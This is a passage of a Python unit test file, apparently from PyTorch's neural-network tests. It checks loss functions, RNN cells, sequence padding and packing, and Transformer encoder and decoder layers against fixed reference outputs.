def test_loss_equal_input_target_shape(self):
self._test_loss_equal_input_target_shape(lambda x: x)
def test_mse_loss_size_warning(self):
i = torch.randn((10, 1), requires_grad=True)
t = torch.randn((10,))
with warnings.catch_warnings(record=True) as w:
# Ensure warnings are being shown
warnings.simplefilter("always")
# Trigger Warning
F.mse_loss(i, t)
# Check warning occurs
self.assertEqual(len(w), 1)
self.assertIn('Please ensure they have the same size.', str(w[0]))
def test_poisson_nll_loss_reduction_modes(self):
input = torch.tensor([0.5, 1.5, 2.5])
target = torch.tensor([1., 2., 3.])
component_wise_loss = torch.exp(input) - target * input
self.assertEqual(component_wise_loss,
F.poisson_nll_loss(input, target, reduction='none'))
self.assertEqual(torch.sum(component_wise_loss),
F.poisson_nll_loss(input, target, reduction='sum'))
self.assertEqual(torch.mean(component_wise_loss),
F.poisson_nll_loss(input, target, reduction='mean'))
with self.assertRaisesRegex(ValueError, 'is not valid'):
F.poisson_nll_loss(input, target, reduction='total')
def test_gaussian_nll_loss_reduction_modes(self):
input = torch.tensor([[0.5, 1.5, 2.5], [2., 4., 6.]])
target = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
var = torch.tensor([[0.5, 1., 1.5], [1., 1.5, 2.]])
component_wise_loss = 0.5 * (torch.log(var) + (input - target)**2 / var)
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target, var, reduction='none'))
self.assertEqual(torch.sum(component_wise_loss),
F.gaussian_nll_loss(input, target, var, reduction='sum'))
self.assertEqual(torch.mean(component_wise_loss),
F.gaussian_nll_loss(input, target, var, reduction='mean'))
with self.assertRaisesRegex(ValueError, 'is not valid'):
F.gaussian_nll_loss(input, target, var, reduction='total')
def test_gaussian_nll_loss_broadcasting(self):
input = torch.tensor([[0.5, 1.5, 2.5], [2., 4., 6.]])
target_full = torch.tensor([[1., 2., 3.], [1., 2., 3.]])
target_part = torch.tensor([[1., 2., 3.]])
var_full = torch.tensor([[0.5, 0.5, 0.5], [1.5, 1.5, 1.5]])
var_part1 = torch.tensor([[0.5], [1.5]])
var_part2 = torch.tensor([0.5, 1.5])
component_wise_loss = 0.5 * (torch.log(var_full) + (input - target_full)**2 / var_full)
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_part, var_full, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_full, var_part1, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_full, var_part2, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_part, var_part1, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_part, var_part2, reduction='none'))
def test_gaussian_nll_loss_args(self):
input = torch.randn(3, 5)
with self.assertRaisesRegex(ValueError, 'var is of incorrect size'):
target = torch.randn(3, 5)
var = torch.ones(3, 3)
torch.nn.functional.gaussian_nll_loss(input, target, var)
with self.assertRaisesRegex(ValueError, 'var has negative entry/entries'):
var = -1 * torch.ones(3, 5)
torch.nn.functional.gaussian_nll_loss(input, target, var)
def test_KLDivLoss_batch_mean(self):
input_shape = (2, 5)
log_prob1 = F.log_softmax(torch.randn(input_shape), 1)
prob2 = F.softmax(torch.randn(input_shape), 1)
loss = nn.KLDivLoss(reduction='batchmean')
l = loss(log_prob1, prob2)
loss_none_reduce = nn.KLDivLoss(reduction='sum')(log_prob1, prob2)
expected = loss_none_reduce / input_shape[0]
self.assertEqual(l, expected)
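# A compact sketch of the distinction exercised above: reduction='mean'
# divides the summed loss by the number of elements, while 'batchmean'
# divides by the batch size only, matching the mathematical definition of
# KL divergence. (Helper name is ours; not collected as a test.)
def _kldiv_batchmean_sketch(self, log_p, q):
    pointwise = nn.KLDivLoss(reduction='none')(log_p, q)
    return pointwise.sum() / log_p.size(0)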
def test_KLDivLoss_batch_mean_log_target(self):
input_shape = (2, 5)
log_prob1 = F.log_softmax(torch.randn(input_shape), 1)
log_prob2 = F.log_softmax(torch.randn(input_shape), 1)
loss = nn.KLDivLoss(reduction='batchmean', log_target=True)
l = loss(log_prob1, log_prob2)
loss_none_reduce = nn.KLDivLoss(reduction='sum', log_target=True)(log_prob1, log_prob2)
expected = loss_none_reduce / input_shape[0]
self.assertEqual(l, expected)
def test_CTCLoss_typechecks(self):
target_lengths = torch.tensor([30, 25, 20])
input_lengths = torch.tensor([50, 50, 50])
targets = torch.randint(1, 15, (sum(target_lengths),), dtype=torch.int)
log_probs = torch.randn(50, 3, 15, dtype=torch.float).log_softmax(2)
with self.assertRaises(RuntimeError):
_input_lengths = input_lengths.to(dtype=torch.float)
torch.nn.functional.ctc_loss(log_probs, targets, _input_lengths, target_lengths)
with self.assertRaises(RuntimeError):
target_lengths = target_lengths.to(dtype=torch.float)
torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_lengthchecks_cuda(self):
target_lengths = [30, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (3, 29), dtype=torch.long, device='cuda')
log_probs = torch.randn(50, 3, 15, dtype=torch.float, device='cuda').log_softmax(2)
with self.assertRaises(RuntimeError):
torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
def test_CTCLoss_lengthchecks_cpu(self):
target_lengths = [30, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (3, 29), dtype=torch.int)
log_probs = torch.randn(50, 3, 15, dtype=torch.float).log_softmax(2)
with self.assertRaises(RuntimeError):
torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_long_targets(self):
input_length = 4000
vocab_size = 3
batch_size = 4
target_length = 1200
log_probs = torch.randn(input_length, batch_size, vocab_size).log_softmax(2).requires_grad_()
targets = torch.randint(low=1, high=vocab_size - 1, size=(batch_size, target_length), dtype=torch.long)
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
res_cpu = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
grad_out = torch.randn_like(res_cpu)
grad_cpu, = torch.autograd.grad(res_cpu, log_probs, grad_out)
with torch.backends.cudnn.flags(enabled=False):
res_gpu = torch.nn.functional.ctc_loss(log_probs.cuda(), targets.cuda(), input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
grad_gpu, = torch.autograd.grad(res_gpu, log_probs, grad_out.cuda())
self.assertEqual(res_cpu, res_gpu, atol=1e-4, rtol=0)
self.assertEqual(grad_cpu, grad_gpu, atol=1e-4, rtol=0)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_critical_target_len(self):
# cudnn has an unexpected problem with target length 256, see issue #53505
N = 1
S = 256
C = 10
T = 500
target = torch.randint(low=1, high=C, size=(S,), dtype=torch.int)
input_lengths = torch.full(size=(N,), fill_value=T, dtype=torch.int)
target_lengths = torch.tensor(S, dtype=torch.int)
inp = torch.randn(T, N, C, dtype=torch.float, device='cuda').log_softmax(2).requires_grad_()
with cudnn.flags(enabled=True):
res_gpu = torch.nn.functional.ctc_loss(inp, target, input_lengths, target_lengths, reduction='none')
res_cpu = torch.nn.functional.ctc_loss(inp.cpu(), target, input_lengths, target_lengths, reduction='none')
self.assertEqual(res_cpu, res_gpu, atol=1e-3, rtol=0)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_zero_infinity(self):
target_lengths = [60, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (sum(target_lengths),), dtype=torch.int, device='cuda')
log_probs = torch.randn(50, 3, 15, dtype=torch.float, device='cuda').log_softmax(2).requires_grad_()
res = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
with torch.backends.cudnn.flags(enabled=False):
res2 = torch.nn.functional.ctc_loss(log_probs, targets.cuda().long(), input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
res_cpu = torch.nn.functional.ctc_loss(log_probs.cpu(), targets.cpu(), input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
self.assertEqual(res2, res, atol=1e-4, rtol=0)
self.assertEqual(res_cpu, res.cpu(), atol=1e-4, rtol=0)
g1, = torch.autograd.grad(res, log_probs)
g2, = torch.autograd.grad(res2, log_probs)
g3, = torch.autograd.grad(res_cpu, log_probs)
self.assertEqual(g2, g3, atol=1e-4, rtol=0)
self.assertEqual(g1, g2, atol=1e-4, rtol=0)
self.assertTrue((g1 == g1).all().item()) # check that we don't have NaN
def test_RNN_cell_no_broadcasting(self):
def test(cell_module, input, hx, input_size, hidden_size):
cell = cell_module(input_size, hidden_size)
self.assertRaises(RuntimeError, lambda: cell(input, hx))
def test_all(hidden_size, bad_hx, good_hx, input_size, input):
test(nn.RNNCell, input, bad_hx, input_size, hidden_size)
test(nn.GRUCell, input, bad_hx, input_size, hidden_size)
test(nn.LSTMCell, input, (bad_hx, good_hx), input_size, hidden_size)
test(nn.LSTMCell, input, (good_hx, bad_hx), input_size, hidden_size)
hidden_size = 20
input_size = 10
input = torch.randn(3, input_size)
bad_hx = torch.randn(1, hidden_size)
good_hx = torch.randn(3, hidden_size)
# Test hidden/input batch size broadcasting
test_all(hidden_size, bad_hx, good_hx, input_size, input)
# Test hx's hidden_size vs module's hidden_size broadcasting
bad_hx = torch.randn(3, 1)
test_all(hidden_size, bad_hx, good_hx, input_size, input)
# Test input's input_size vs module's input_size broadcasting
bad_input = torch.randn(3, 1)
test_all(hidden_size, good_hx, good_hx, input_size, bad_input)
def test_invalid_dropout_p(self):
v = torch.ones(1)
self.assertRaises(ValueError, lambda: nn.Dropout(-0.1))
self.assertRaises(ValueError, lambda: nn.Dropout(1.1))
self.assertRaises(ValueError, lambda: nn.Dropout2d(-0.1))
self.assertRaises(ValueError, lambda: nn.Dropout2d(1.1))
self.assertRaises(ValueError, lambda: nn.Dropout3d(-0.1))
self.assertRaises(ValueError, lambda: nn.Dropout3d(1.1))
self.assertRaises(ValueError, lambda: F.dropout(v, -0.1))
self.assertRaises(ValueError, lambda: F.dropout(v, 1.1))
def test_pad_sequence(self):
def pad(tensor, length):
return torch.cat(
[tensor.data, tensor.data.new(
length - tensor.size(0), *tensor.size()[1:]).zero_()])
# single dimensional
a = torch.tensor([1, 2, 3])
b = torch.tensor([4, 5])
c = torch.tensor([6])
# batch_first = true
expected = torch.tensor([[4, 5, 0], [1, 2, 3], [6, 0, 0]])
padded = rnn_utils.pad_sequence([b, a, c], True)
self.assertEqual(padded, expected)
# batch_first = false
padded = rnn_utils.pad_sequence([b, a, c])
self.assertEqual(padded, expected.transpose(0, 1))
# pad with non-zero value
expected = torch.tensor([[4, 5, 1], [1, 2, 3], [6, 1, 1]])
padded = rnn_utils.pad_sequence([b, a, c], True, 1)
self.assertEqual(padded, expected)
# Test pad sorted sequence
expected = torch.tensor([[1, 2, 3], [4, 5, 0], [6, 0, 0]])
padded = rnn_utils.pad_sequence([a, b, c], True)
self.assertEqual(padded, expected)
# more dimensions
maxlen = 9
for num_dim in (0, 1, 2, 3):
sequences = []
trailing_dims = [4] * num_dim
for i in range(1, maxlen + 1):
seq_len = i * i
sequences.append(torch.rand(seq_len, 5, *trailing_dims))
random.shuffle(sequences)
expected = []
for seq in sequences:
expected.append(pad(seq, maxlen * maxlen))
# batch first = true
expected = torch.stack(expected)
padded = rnn_utils.pad_sequence(sequences, True)
self.assertEqual(padded, expected)
# batch first = false
padded = rnn_utils.pad_sequence(sequences)
self.assertEqual(padded, expected.transpose(0, 1))
def test_pack_sequence(self):
def _compatibility_test(sequences, lengths, batch_first, enforce_sorted=False):
padded = rnn_utils.pad_sequence(sequences, batch_first)
packed = rnn_utils.pack_sequence(sequences, enforce_sorted)
unpacked = rnn_utils.pad_packed_sequence(packed, batch_first)
self.assertEqual(padded, unpacked[0])
pack_padded = rnn_utils.pack_padded_sequence(
padded, lengths, batch_first, enforce_sorted)
self.assertEqual(packed, pack_padded)
# single dimensional
a = torch.tensor([1, 2, 3])
b = torch.tensor([4, 5])
c = torch.tensor([6])
packed = rnn_utils.pack_sequence([a, b, c], enforce_sorted=False)
expected = torch.tensor([1, 4, 6, 2, 5, 3])
self.assertEqual(packed.batch_sizes, [3, 2, 1])
self.assertEqual(packed.data.data, expected)
self.assertEqual(packed.sorted_indices, [0, 1, 2])
self.assertEqual(packed.unsorted_indices, [0, 1, 2])
packed_unsorted = rnn_utils.pack_sequence([b, c, a], enforce_sorted=False)
self.assertEqual(packed_unsorted.batch_sizes, [3, 2, 1])
self.assertEqual(packed_unsorted.data.data, expected)
self.assertEqual(packed_unsorted.sorted_indices, [2, 0, 1])
self.assertEqual(packed_unsorted.unsorted_indices, [1, 2, 0])
# single dimensional, enforce_sorted = True
packed_enforce_sorted = rnn_utils.pack_sequence([a, b, c], enforce_sorted=True)
self.assertEqual(packed_enforce_sorted.batch_sizes, [3, 2, 1])
self.assertEqual(packed_enforce_sorted.data.data, expected)
self.assertTrue(packed_enforce_sorted.sorted_indices is None)
self.assertTrue(packed_enforce_sorted.unsorted_indices is None)
with self.assertRaisesRegex(RuntimeError, 'must be sorted in decreasing order'):
rnn_utils.pack_sequence([b, c, a], enforce_sorted=True)
with self.assertRaisesRegex(RuntimeError, 'You can pass `enforce_sorted=False`'):
rnn_utils.pack_sequence([b, c, a], enforce_sorted=True)
# more dimensions
maxlen = 9
for num_dim in (0, 1, 2, 3):
sequences = []
lengths = []
trailing_dims = [4] * num_dim
for i in range(maxlen, 0, -1):
seq_len = i * i
lengths.append(seq_len)
sequences.append(torch.rand(seq_len, 5, *trailing_dims))
unsorted_sequences = [s.clone() for s in sequences]
random.shuffle(unsorted_sequences)
unsorted_sequences_lengths = [t.size(0) for t in unsorted_sequences]
# compatibility with other utilities
for batch_first in (True, False):
for enforce_sorted in (True, False):
_compatibility_test(sequences, lengths, batch_first, enforce_sorted)
_compatibility_test(unsorted_sequences, unsorted_sequences_lengths,
batch_first)
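# A minimal sketch (helper name is ours; not collected as a test) of where the
# batch_sizes asserted above come from: after sorting by length in decreasing
# order, batch_sizes[t] counts how many sequences are still active at time
# step t, so lengths (3, 2, 1) yield [3, 2, 1].
def _batch_sizes_sketch(self, lengths):
    lengths = sorted(lengths, reverse=True)
    return [sum(1 for l in lengths if l > t) for t in range(lengths[0])]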
def test_pack_padded_sequence(self):
def generate_test_case(sorted_lengths, should_shuffle):
def pad(tensor, length):
return torch.cat([tensor, tensor.new(length - tensor.size(0), *tensor.size()[1:]).zero_()])
max_length = sorted_lengths[0]
batch_sizes = [sum(map(bool, filter(lambda x: x >= i, sorted_lengths)))
for i in range(1, max_length + 1)]
offset = 0
padded = torch.cat([pad(i * 100 + torch.arange(1., 5 * l + 1).view(l, 1, 5), max_length)
for i, l in enumerate(sorted_lengths, 1)], 1)
expected_data = [[torch.arange(1., 6) + (i + 1) * 100 + 5 * n for i in range(batch_size)]
for n, batch_size in enumerate(batch_sizes)]
expected_data = list(itertools.chain.from_iterable(expected_data))
expected_data = torch.stack(expected_data, dim=0)
if should_shuffle:
# Shuffle the padded sequence to create an unsorted sequence
permutation = list(range(len(sorted_lengths)))
random.shuffle(permutation)
unsorted_indices = torch.tensor(permutation)
padded = padded.index_select(1, unsorted_indices)
lengths = torch.tensor(sorted_lengths).index_select(0, unsorted_indices)
else:
unsorted_indices = None
lengths = sorted_lengths
return padded.requires_grad_(), lengths, expected_data, batch_sizes, unsorted_indices
test_cases = [
# sorted_lengths, should_shuffle
[[10, 8, 4, 2, 2, 2, 1], False],
[[11, 10, 8, 6, 4, 3, 1], False],
[[11, 10, 8, 6, 4, 3, 1], True],
]
for test_case, batch_first in itertools.product(test_cases, (True, False)):
sorted_lengths, should_shuffle = test_case
padded, lengths, expected_data, batch_sizes, unsorted_indices = generate_test_case(
sorted_lengths, should_shuffle)
src = padded
if batch_first:
src = src.transpose(0, 1)
# check output
packed = rnn_utils.pack_padded_sequence(src, lengths, batch_first=batch_first,
enforce_sorted=not should_shuffle)
self.assertEqual(packed.data.data, expected_data)
self.assertEqual(packed.batch_sizes, batch_sizes)
self.assertEqual(packed.unsorted_indices, unsorted_indices)
# test inverse
unpacked, unpacked_len = rnn_utils.pad_packed_sequence(packed, batch_first=batch_first)
self.assertEqual(unpacked, src)
self.assertEqual(unpacked_len, lengths)
# check grad
if padded.grad is not None:
padded.grad.data.zero_()
grad_output = unpacked.data.clone().normal_()
unpacked.backward(grad_output)
if batch_first:
grad_output.transpose_(0, 1)
for i, l in enumerate(lengths):
self.assertEqual(padded.grad.data[:l, i], grad_output[:l, i])
if l < 10:
self.assertEqual(padded.grad.data[l:, i].abs().sum(), 0)
# test error messages
with self.assertRaisesRegex(RuntimeError, 'You can pass `enforce_sorted=False`'):
packed = rnn_utils.pack_padded_sequence(torch.randn(3, 3), [1, 3, 2])
with self.assertRaisesRegex(RuntimeError, 'empty tensor'):
packed = rnn_utils.pack_padded_sequence(torch.randn(0, 0), [])
def test_LSTM_cell(self):
# this is just a smoke test; these modules are implemented through
# autograd so no Jacobian test is needed
for bias in (True, False):
input = torch.randn(3, 10)
hx = torch.randn(3, 20)
cx = torch.randn(3, 20)
lstm = nn.LSTMCell(10, 20, bias=bias)
for _ in range(6):
hx, cx = lstm(input, (hx, cx))
(hx + cx).sum().backward()
def test_LSTM_cell_forward_input_size(self):
input = torch.randn(3, 11)
hx = torch.randn(3, 20)
cx = torch.randn(3, 20)
lstm = nn.LSTMCell(10, 20)
self.assertRaises(Exception, lambda: lstm(input, (hx, cx)))
def test_LSTM_cell_forward_hidden_size(self):
input = torch.randn(3, 10)
hx = torch.randn(3, 21)
cx = torch.randn(3, 20)
lstm = nn.LSTMCell(10, 20)
self.assertRaises(Exception, lambda: lstm(input, (hx, cx)))
self.assertRaises(Exception, lambda: lstm(input, (cx, hx)))
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_pack_sequence_batch_sizes_throw(self):
with self.assertRaisesRegex(ValueError, r"batch_sizes should always be on CPU"):
m = nn.LSTM(3, 4, bidirectional=True, num_layers=2).to('cuda')
a = torch.rand(5, 3, device='cuda')
b = torch.tensor([1, 1, 1, 1, 1], device='cuda')
input = nn.utils.rnn.PackedSequence(a, b)
def test_Transformer_cell(self):
# this is just a smoke test; these modules are implemented through
# autograd so no Jacobian test is needed
d_model = 512
nhead = 16
num_encoder_layers = 4
num_decoder_layers = 3
dim_feedforward = 256
dropout = 0.3
bsz = 8
seq_length = 35
tgt_length = 15
for batch_first, src_size, tgt_size in zip((True, False),
[(bsz, seq_length, d_model),
(seq_length, bsz, d_model)],
[(bsz, tgt_length, d_model),
(tgt_length, bsz, d_model)]):
transformer = nn.Transformer(d_model, nhead, num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, batch_first=batch_first)
src = torch.randn(src_size)
src_mask = transformer.generate_square_subsequent_mask(seq_length).double()
tgt = torch.randn(tgt_size)
tgt_mask = transformer.generate_square_subsequent_mask(tgt_length).double()
memory_mask = torch.randn(tgt_length, seq_length).double()
src_key_padding_mask = torch.rand(bsz, seq_length) >= 0.5
tgt_key_padding_mask = torch.rand(bsz, tgt_length) >= 0.5
memory_key_padding_mask = torch.rand(bsz, seq_length) >= 0.5
output = transformer(src, tgt,
src_mask=src_mask,
tgt_mask=tgt_mask,
memory_mask=memory_mask,
src_key_padding_mask=src_key_padding_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
output.sum().backward()
def test_transformerencoderlayer(self):
# this is a deterministic test for TransformerEncoderLayer
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
for batch_first in (False, True):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout,
batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
encoder_input = torch.tensor([[[20., 30., 40., 50.]]])
result = model(encoder_input)
ref_output = torch.tensor([[[2.258703, 0.127985, -0.697881, 0.170862]]])
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# 0 values are NOT masked. This shouldn't mask anything.
mask = torch.tensor([[0]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# 1 values are masked. Since there is only 1 input embedding this
# will result in nan.
mask = torch.tensor([[1]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertTrue(np.isnan(result).all())
# deterministic input
encoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.272644, 0.119035, -0.691669, 0.153486]],
[[2.272644, 0.119035, -0.691669, 0.153486]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# all 0 which is no masking
mask = torch.tensor([[0, 0]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
mask = torch.tensor([[1, 0]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.301516, 0.092249, -0.679101, 0.103088]],
[[2.301516, 0.092249, -0.679101, 0.103088]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.428589, 0.020835, -0.602055, -0.085249],
[2.427987, 0.021213, -0.602496, -0.084103]],
[[2.424689, 0.019155, -0.604793, -0.085672],
[2.413863, 0.022211, -0.612486, -0.072490]],
[[2.433774, 0.021598, -0.598343, -0.087548],
[2.425104, 0.019748, -0.604515, -0.084839]],
[[2.436185, 0.022682, -0.596625, -0.087261],
[2.433556, 0.021891, -0.598509, -0.086832]],
[[2.416246, 0.017512, -0.610712, -0.082961],
[2.422901, 0.024187, -0.606178, -0.074929]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# all 0
mask = torch.zeros([2, 5]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
mask[0, 1] = 1
mask[1, 3] = 1
mask[1, 4] = 1
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.429026, 0.020793, -0.601741, -0.085642],
[2.428811, 0.021445, -0.601912, -0.084252]],
[[2.425009, 0.019155, -0.604566, -0.085899],
[2.415408, 0.02249, -0.611415, -0.073]],
[[2.434199, 0.021682, -0.598039, -0.087699],
[2.42598, 0.019941, -0.603896, -0.085091]],
[[2.436457, 0.022736, -0.59643, -0.08736],
[2.434021, 0.022093, -0.598179, -0.08679]],
[[2.416531, 0.017498, -0.610513, -0.083181],
[2.4242, 0.024653, -0.605266, -0.074959]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
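# A compact restatement of the masking convention exercised above (True means
# the position is masked/ignored), as a sketch for building such masks from
# sequence lengths. (Helper name is ours; not collected as a test.)
def _key_padding_mask_sketch(self, lengths, max_len):
    # [batch, seq] bool mask; padding positions (index >= length) are True
    idx = torch.arange(max_len)
    return idx.unsqueeze(0) >= torch.tensor(lengths).unsqueeze(1)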
def test_transformerencoderlayer_gelu(self):
# this is a deterministic test for TransformerEncoderLayer with gelu activation
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
for activation, batch_first in product(('gelu', F.gelu, nn.GELU()), (True, False)):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
encoder_input = torch.tensor([[[20., 30., 40., 50.]]])
result = model(encoder_input)
ref_output = torch.tensor([[[2.249815, 0.131006, -0.702199, 0.177868]]])
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.264103, 0.121417, -0.696012, 0.159724]],
[[2.264103, 0.121417, -0.696012, 0.159724]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.42163188, 0.03227153, -0.60714219, -0.05908082],
[2.42151276, 0.03302179, -0.60722523, -0.05762651]],
[[2.41926761, 0.02974034, -0.60879519, -0.0621269],
[2.41626395, 0.03539356, -0.61087842, -0.04978623]],
[[2.42382808, 0.03218872, -0.6055963, -0.06073591],
[2.41983477, 0.03085259, -0.60840145, -0.06046414]],
[[2.42500749, 0.03328855, -0.60476388, -0.0595334],
[2.4237977, 0.03290575, -0.60561789, -0.05940082]],
[[2.41383916, 0.02686345, -0.61256377, -0.06380707],
[2.42000277, 0.03800944, -0.60824798, -0.04754947]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
def test_transformerdecoderlayer(self):
# this is a deterministic test for TransformerDecoderLayer
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
seq_length = 5
tgt_length = 3
for batch_first in (False, True):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout,
batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]])
memory_input = torch.tensor([[[60., 70., 80., 90.]]])
result = model(decoder_input, memory_input)
ref_output = torch.tensor([[[2.314351, 0.094805, -0.671322, 0.101977]]])
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
memory_input = torch.tensor([[[1., 2., 3., 4.]]])
result = model(decoder_input, memory_input)
result = result.detach().numpy()
ref_output = perm_fn(torch.tensor([[[2.422245, 0.051716, -0.606338, -0.024756]],
[[2.422245, 0.051716, -0.606338, -0.024756]]]))
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.343536, 0.085561, -0.654954, 0.074991]],
[[2.343536, 0.085561, -0.654954, 0.074991]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]))
